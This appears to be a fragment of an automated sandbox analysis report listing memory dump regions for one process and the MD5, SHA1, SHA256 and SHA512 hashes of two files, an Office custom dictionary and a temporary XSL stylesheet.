memory/4700-11-0x00007FFAA4F20000-0x00007FFAA4F30000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | d29962abc88624befc0135579ae485ec |
| SHA1 | e40a6458296ec6a2427bcb280572d023a9862b31 |
| SHA256 | a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866 |
| SHA512 | 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f |
memory/4700-29-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
memory/4700-30-0x00007FFAE70ED000-0x00007FFAE70EE000-memory.dmp
memory/4700-31-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
memory/4700-32-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCDD017.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |